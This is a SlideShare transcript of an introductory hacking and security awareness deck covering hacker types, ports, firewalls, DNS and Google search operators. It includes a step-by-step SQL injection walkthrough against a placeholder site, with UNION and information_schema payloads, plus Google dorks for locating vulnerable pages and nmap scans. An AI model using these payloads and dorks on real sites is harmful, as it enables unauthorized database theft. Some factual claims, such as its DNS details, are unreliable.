SlideShare a Scribd company logo
1 of 61
Introduction to Hacking
Hacking is the art of manipulating things such
that it works the way ; it wasn’t supposed to
do.
So, the term ‘Hacking’ is not only confined to
the world of computers only.
EX : Opening the car window using a ruler
Who am I ?
Hacker is a person who loves to explore the
technology and takes it to next level.
According to some stereotypes, Hacking
today refers to breaking in computer system
without authorization, which is a criminal
offense as per law.
The person who uses their hacking skills for
malicious purpose is called cracker .
Types of Hacker
White Hat | Grey Hat | Black Hat
Technical Level of Hackers
Neophyte – A Newbie in the field of
Computer Security with almost no
knowledge.
Script Kiddie – A non-expert who uses
Tools or Scripts made by other Hackers
into System with little knowledge about
the concept working behind the tool.
Elite – Also known as 1337, it is a term
used to describe the most technically
advanced hackers who use cutting edge
technology.
IS HACKING LEGAL?
Yes, Hacking is legal, if you are authorized for
the same i.e hired to find Vulnerabilities.
This is the job of an ETHICAL HACKER
Ethical Hacker is a person who uses their
hacking skills for finding security loop holes or
vulnerabilities in hiring TARGET system and
reports the flaws to administrator of the
company.
Security Triangle
Defines Balance between Security , Functionality and Ease of use
As security increases, the system’s functionality and ease of use decreases .
Internet Protocol
Class of IP Address
NOTE : NID – Network ID , HID – Host ID
Ports and Services
• FTP 21
• SSH 22
• TELNET 23
• SMTP 25
• WWW 80
• SSL 443
• ORACLE TNS Listener 1521
STEPS OF MALICIOUS HACKING
STEPS OF ETHICAL HACKING
1.
Information
gathering
2. Scanning
3. Gaining
Access
4. Generating
Report
5. Report
vunerability
Footprinting
• Process of creating a blueprint or map of an
organization’s network and systems.
• Or It is a technique of gathering information
form various Sources.
• Generally, a hacker spends 90
percent of the time profiling
and gathering information on
a target and 10 percent of the
time launching the attack.
Sources of Information
• Media – TV , News etc
• Social Network – facebook, Twitter, Google+
• Search Engine – Google, Yahoo, Bing
• People Search – Yahoo! People, 123people.com
etc.
• Domain name Lookups – Whois, SamSpade,
Nslookup, Domain name lookup, DnsStuff
• Network Range - ARIN, IANA,
• Geographic Map – Traceroute, NeoTrace,
VisualRoute
• “Every single bit of information can useful”
Sources of Information
Online Lookups
• Whois , ARIN , Centralops, SamSpade
• DNSstuff, Visual Trace, NeoTrace
Social Network + People Search
• Facebook, Google + , Twitter
• Yahoo! People, 123people
Search Engines, News Groups
• Google news, iGoogle
• Google, Yahoo, Bing, Ask
Scanning
• Nmap –A 192.168.56.1/24
• Nmap –O 192.168.56.101
Woooohh……firewall !!
What is firewall?
Firewalls are software program or hardware
devices that works as a filter between your
computer (or network) and internet depending
upon a set of rules.
It is similar to security guard at entrance who
prevents intruders to enter the house
and also prevents convicts from
escaping out.
Firewalls are of two types:
1. Software firewalls 2. Hardware firewalls
Software firewalls
• Used by individual home users
• Installed on your computer as an application software.
• Runs in background and monitors the network activity.
• Ex: windows firewall, Black ice defender, kaspersky internet
security, AVG internet security etc.
•
• It is a device that guards the entrance to a network, not an
individual computer.
• Basically, installed between your broadband
cable or DSL modem and your computers.
• Provides higher level of security than software firewalls.
Hardware firewall
How firewall works : outbound
How firewall works: Inbound
What is DNS?
• DNS stands for Domain Name Server.
• It was difficult to remember ip address for each
websites, so it came into action.
• It maintains table that contains domian names vs ip
address columns in its database.
• Used for translating domain names into their
respective ip address.
• Ex : facebook.com = 66.220.158.11
• Stores frequently used domains in its cache.
• Ex : Google’s open DNS server : 4.2.2.2
How DNS servers work?
Google Hacking
Founders of Google:
Sergey Brin and Larry Page
“Google Hacking” doesn’t mean
“How to hack Google? ”.
It is skill to extract valuable
information from web with the
help of special keywords called
“GOOGLE DORKS”
Main idea is to “Pick a vulnerability, find the site”.
How Google works?
• Google Bots : Bots are computer program that automatically
browse the world wide web in some order. These are also called
web crawlers, spiders, ants or robots. Google uses mainly two bots :
 Crawlers : It traverses over the web following the links found on
different pages. When it finds any new page, sends its link to spider.
 Spiders : It is a robotic browser like program that downloads the web
pages associated with the link send by crawlers.
• Indexer : It dissects and sorts each word, images etc on the every
web page downloaded by spiders.
• The Database is a warehouse for storing the pages downloaded and
processed.
• Search Engine Results : Depending upon search keywords, it digs
search results out of the database following an algorithm.
Google : Server side
Google bots
Crawler finds new pages via
• URL submission at http://google.com/addurl.html
• Following different links present on each webpage.
Spiders download these webpages on google servers
Google : Client Side
Basics of Google Hacking
+ Forces the word to be searched +firefox , will bring up results that
contains the word firefox.
- Eliminates the word from search results -chrome, will bring up results that
doesn’t contains word chrome
“ ” delimiters for entire search phrases
(not single words)
“Internet Explorer" will return
documents containing the phrase
Internet Explorer
. Single letter wildcard Krazzy.hack will search for words like
krazzy@hack, krazzy2hack, krazzy-
hack, krazzy_hack etc.
* Single word wildcard hack * planet will search for words
like hack the planet, hack for planet,
hack all planet etc.
| logical OR firefox|chrome will return
documents containing either firefox
or chrome but not both.
Google query : keywords - I
site Restricts the search within the
specified domain.
site:xyz.com will show all pages on
xyz.com crawled by Google bots
intitle restricts results to documents whose
title contains the specified word
intitle:fox fire will find all sites with
the word fox in the
title and fire in the text
allintitle restricts results to documents whose
title contains all the specified
phrases
allintitle:fox fire will find all sites with
the words fox and fire in the title, so
it's equivalent to intitle:fox intitle:fire
inurl restricts the results to sites whose
URL contains specified word
inurl:hacker will find sites whose url
contain word hacker.
allinurl restricts results to sites whose URL
contains all the specified phrases
allinurl:hacker vs cracker will find the
sites whose url contains hacker vs
cracker
filetype Filters search to specified filetypes filetype:pdf Google hacking will
show all the pdf documents
containing word Google hacking
Google query : keywords -II
link restricts results to sites
containing links to the specified
location
link:www.google.com will return
documents containing one or more
links to www.google.com
inanchor restricts results to sites
containing anchored text with
the specified word
inanchor: backtrack will return
documents that has fire as anchored
text (not url)
allintext restricts results to documents
containing the specified phrase
in the text only.
allintext:“kevin Mitnik" will return
documents which contain the phrase
kevin Mitnik in their text only
numrange restricts results to documents
containing a number from the
specified Range
numrange:1-100 fire will return sites
containing a number from 1 to 100 and
the word fire. The same result can be
achieved with 1..100 fire
cache Shows cache version of URL cache:xyz.com will show how the site
looked , the last time Google bots
visited the site.
Advanced Google Dorks
• Inurl:view/index.shtml
• Inurl:view/view.shtml
System Hacking
Where windows installs password
Reset windows logon password
Play with sticky keys
OPHCRACK
Make a folder System Hidden
Enable/Disable USB devices
Make Drives invisible
Make a undeletable folder
Trojans
Email Hacking
Email Hacking
How to Trace sender of email
Check if sender has opened your mail
Get ip address of your friend on chat
Secret Question….
Phishing – Yeah I got A fish ;-)
Keyloggers – what the heck??
Phishing
Attacker convinces the victim to put their details on a fake page
When Attacker enters their credentials on the form is stored on another log file
And Victim is redirected to Original site.
Software keyloggers
Key loggers
Hardware keylogger
Connect the keylogger
Identify a keylogger
Hardware keyloggers
Website Hacking
OSWAP Report
SQL Injection
SQL Injection
• What is Database?
- Collection of logically related data
- It is similar to Attendance register
• Define Table ?
- It combination of rows and columns
• What is SQL ?
- SQL stands for Structured Query Language.
- Used to select the information from database
Basic SQL queries
Create a table
• Create table users(name varchar2(30), email varchar(50),
password varchar(30), address varchar2(100));
Extracting data from table
• Select name, email, password from users;
• Select * from users where email=‘xyz@abc.com’ AND
password=‘s3cr3t’;
• Select * from users order by name;
Basics of SQL Injection
• How to find a site that is vulnerable to sql
injection attack?
- Use Google dorks
- Inurl:view_faculty.php?id=
- Inurl:viz.php?id=
- Inurl:list.php?id=
- Use Vunerability scanner
- Acutenix
- W3af
What happens in background??
• Check if site is vulnerable or not?
- Ex : http://xyz.com/list.php?id=3
Select name, email, password from users where
id =3;
- Ex : http://xyz.com/list.php?id=3’
Select name, email, password from users where
id =3’;
THIS WILL GIVE AN ERROR MESSAGE, MEANS WE
CAN DIRECTLY COMMUICATE WITH DATABASE !!
So WHAT’s NEXT???
• We will try to find no of columns in the Table
http://xyz.com/list.php?id=3+order+by+1--
 Select name, email, password from users where id =3
order by 1--
- It will extract name, email, passowrd from users table
and sort the contents by 1st column; So it will give you
fresh original webpage.
 Select name, email, password from users where id =3
order by 100—
- It will extract name, email, passowrd from users table and
sort the contents by 100th column; There isn’t any 100th
column so it will give you error.
Finding columns
• So , we will increment ‘order by value by 1’
untill we get error
http://xyz.com/list.php?id=3+order+by+1--
http://xyz.com/list.php?id=3+order+by+2--
http://xyz.com/list.php?id=3+order+by+3--
:
:
http://xyz.com/list.php?id=3+order+by+7--
The above query returns error , means there are
6 columns current table.
Find the Vulnerable column
• We select all the columns i.e from 1-6
http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--
• Try to find the vulnerable column that will
retuurn data
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
IT WILL RETURN THE NOS OF VULNERABLE
COLUMN i.e 1,2,3,4,5 or 6.
SQLi cont..
• Suppose it returns 2 and 6
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
• Then we can fetch any information in database at
these column nos
http://xyz.com/list.php?id=-
3+union+all+select+1,@@version,3,4,5,database()--
This will return the version of database and name of database.
SYSTEM VARIABLES
@@version : Returns Version of database
@@user : Returns the user Currently logged in
@@database : Returns the name of database
Information Schema
• Most of the websites use Mysql Databases for
storing their information.
• MySQl has ‘INFORMATION_SCHEMA’ database
which keeps record of all the schemas , tables and
Columns in the server.
• INFORMATION_SCHEMA.SCHEMATA stores
shema details.
• INFORMATION_SCHEMA.TABLES stores all the
information regarding tables in the database.
• INFORMATION_SCHEMA.COLUMNS stores
information of all the columns in all the tables.
SQLi Cont…
• The below query will extract all the database in
the current server.
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_concat(schema
_name) from information_schema.schemata—
• Below code will extract all the tables in current
db
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_conact(table_n
ame) from information_schema.tables—
SQLi Cont…
• Extract all the Columns from the current table
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_conact(colu
mn_name) from information_schema.columns
where table_name=‘users’—
• Extract all the
Metasploit Framework
• It is a framework to exploit the services found
during Scanning Phase
• You can create virus infected files .. Using this
framework within a couple of minutes
• After Breaking into the system, You can set
backdoor, download files , upload files, disable
mouse, disable keyboard…and lots more
• We have provided a detailed full length HD
video tutorial in the DVD and a ebook
Metasploit – The Pentesters Guide
Social Engineering Toolkit
Social Enginnering on Clients
Social Engineer Toolkit
THANKS FOR TOLERATING US

More Related Content

Recently uploaded

JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераMark Opanasiuk
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Skynet Technologies
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?Mark Billinghurst
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfFIDO Alliance
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfFIDO Alliance
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxFIDO Alliance
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...FIDO Alliance
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Patrick Viafore
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxFIDO Alliance
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandIES VE
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfFIDO Alliance
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxFIDO Alliance
 
Generative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfGenerative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfalexjohnson7307
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 

Recently uploaded (20)

JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024Extensible Python: Robustness through Addition - PyCon 2024
Extensible Python: Robustness through Addition - PyCon 2024
 
Introduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptxIntroduction to FIDO Authentication and Passkeys.pptx
Introduction to FIDO Authentication and Passkeys.pptx
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & Ireland
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
Generative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdfGenerative AI Use Cases and Applications.pdf
Generative AI Use Cases and Applications.pdf
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 

Featured

Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
Time Management & Productivity - Best Practices
Time Management & Productivity -  Best PracticesTime Management & Productivity -  Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Applitools
 

Featured (20)

Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity -  Best PracticesTime Management & Productivity -  Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
 

Security Awareness Programme

  • 1. Introduction to Hacking Hacking is the art of manipulating things such that it works the way ; it wasn’t supposed to do. So, the term ‘Hacking’ is not only confined to the world of computers only. EX : Opening the car window using a ruler
  • 2. Who am I ? Hacker is a person who loves to explore the technology and takes it to next level. According to some stereotypes, Hacking today refers to breaking in computer system without authorization, which is a criminal offense as per law. The person who uses their hacking skills for malicious purpose is called cracker .
  • 3. Types of Hacker White Hat | Grey Hat | Black Hat
  • 4. Technical Level of Hackers Neophyte – A Newbie in the field of Computer Security with almost no knowledge. Script Kiddie – A non-expert who uses Tools or Scripts made by other Hackers into System with little knowledge about the concept working behind the tool. Elite – Also known as 1337, it is a term used to describe the most technically advanced hackers who use cutting edge technology.
  • 5. IS HACKING LEGAL? Yes, Hacking is legal, if you are authorized for the same i.e hired to find Vulnerabilities. This is the job of an ETHICAL HACKER Ethical Hacker is a person who uses their hacking skills for finding security loop holes or vulnerabilities in hiring TARGET system and reports the flaws to administrator of the company.
  • 6. Security Triangle Defines Balance between Security , Functionality and Ease of use As security increases, the system’s functionality and ease of use decreases .
  • 8. Class of IP Address NOTE : NID – Network ID , HID – Host ID
  • 9. Ports and Services • FTP 21 • SSH 22 • TELNET 23 • SMTP 25 • WWW 80 • SSL 443 • ORACLE TNS Listener 1521
  • 11. STEPS OF ETHICAL HACKING 1. Information gathering 2. Scanning 3. Gaining Access 4. Generating Report 5. Report vunerability
  • 12. Footprinting • Process of creating a blueprint or map of an organization’s network and systems. • Or It is a technique of gathering information form various Sources. • Generally, a hacker spends 90 percent of the time profiling and gathering information on a target and 10 percent of the time launching the attack.
  • 13. Sources of Information • Media – TV , News etc • Social Network – facebook, Twitter, Google+ • Search Engine – Google, Yahoo, Bing • People Search – Yahoo! People, 123people.com etc. • Domain name Lookups – Whois, SamSpade, Nslookup, Domain name lookup, DnsStuff • Network Range - ARIN, IANA, • Geographic Map – Traceroute, NeoTrace, VisualRoute • “Every single bit of information can useful”
  • 14. Sources of Information Online Lookups • Whois , ARIN , Centralops, SamSpade • DNSstuff, Visual Trace, NeoTrace Social Network + People Search • Facebook, Google + , Twitter • Yahoo! People, 123people Search Engines, News Groups • Google news, iGoogle • Google, Yahoo, Bing, Ask
  • 15. Scanning • Nmap –A 192.168.56.1/24 • Nmap –O 192.168.56.101
  • 17. What is firewall? Firewalls are software program or hardware devices that works as a filter between your computer (or network) and internet depending upon a set of rules. It is similar to security guard at entrance who prevents intruders to enter the house and also prevents convicts from escaping out. Firewalls are of two types: 1. Software firewalls 2. Hardware firewalls
  • 18. Software firewalls • Used by individual home users • Installed on your computer as an application software. • Runs in background and monitors the network activity. • Ex: windows firewall, Black ice defender, kaspersky internet security, AVG internet security etc. •
  • 19. • It is a device that guards the entrance to a network, not an individual computer. • Basically, installed between your broadband cable or DSL modem and your computers. • Provides higher level of security than software firewalls. Hardware firewall
